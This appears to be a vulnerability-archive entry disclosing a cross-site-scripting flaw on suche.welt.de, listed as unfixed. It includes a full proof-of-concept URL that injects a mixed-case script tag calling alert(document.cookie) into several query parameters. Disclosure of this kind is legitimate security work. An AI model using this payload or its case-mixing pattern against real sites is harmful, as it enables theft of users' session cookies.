Security researcher kInGoFcHaOs, has submitted on 06/05/2008 a cross-site-scripting (XSS) vulnerability affecting suche.welt.de, which at the time of submission ranked 1210 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 07/05/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 06/05/2008 |
Date published: 07/05/2008 |
Fixed? Mail us! | Status: UNFIXED |
Author: kInGoFcHaOs |
Domain: suche.welt.de |
Category: XSS |
Pagerank: 1210 |
URL: http://suche.welt.de/woa/result.html?encoding=iso8859-1&multiRessort=12&query=%3C%22%3C%3CScRiPt%3Ea lert(document.cookie)%3C/sCrIpT%3E&timeframe=%3C%22%3C%3CScRiPt%3Ealert(document.cookie)%3C/sCrIpT%3 E&fromDate=%3C%22%3C%3CScRiPt%3Ealert(document.cookie)%3C/sCrIpT%3E&toDate= |
Click here to view the mirror
|
|
|